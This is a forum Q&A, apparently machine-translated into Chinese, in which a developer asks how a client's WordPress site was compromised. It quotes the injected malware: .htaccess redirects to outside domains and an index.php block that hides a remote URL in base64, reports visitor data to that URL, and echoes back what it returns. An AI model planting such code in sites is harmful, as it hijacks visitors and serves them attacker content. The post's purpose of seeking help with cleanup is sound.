我为客户建立了一个wordpress网站。几天后,客户报告该网站已被Google阻止用于恶意软件内容。当我查看网站时,我发现代码中有一些变化,例如.htaccess有这个代码而不是前一个代码。
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://clubatleticoestrada.org.ar/awas.html?h=1110720 [L,R]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://halisahamiz.com/eehs.html?h=1110720 [L,R]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://zabetonom.ru/mhos.html [L,R]
</IfModule>
RewriteEngine On
RewriteBase /
# MCCL
# END MCCL
和index.php有这个:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
这次攻击是如何发生的?如何在此次袭击中阻止自己?
在重置网站时,我发现公共Html文件夹之外的一些文件受到了影响。现在有人管理这个吗?
答案 0 :(得分:2)
整个大型图书馆不足以解释如何执行“黑客攻击”。攻击网站有很多方法和工具。除了SQL injection,cross scripts和密码窃取之外,专业人士也使用复杂的工具。 如果我了解发生了什么,他们已经重定向了您的网站。 我只建议确保您的服务器上有最新的软件更新,请使用this之类的“检查工具”或Acunetix来检查您的网站。黑客也会这样做,以找到易受攻击的网站。 如果您认为重新加载备份可以解决问题,您可能会遇到意外。黑客用来下载后门,他们会回到你的网站。因此更改密码可能无效。我建议你在清理时要非常小心。如果他们的任何其他网站被攻击在同一台服务器上,也请询问您的提供商。在这种情况下,您可以确定服务器上有后门(shell)。在这种情况下,不是您的问题,但提供商有责任整理漏洞并清理服务器。这是最常见的情况。 以上所有内容只是为了粗略地了解问题的复杂性,我完全同意Adrien的观点,即本主题适用于互联网安全论坛。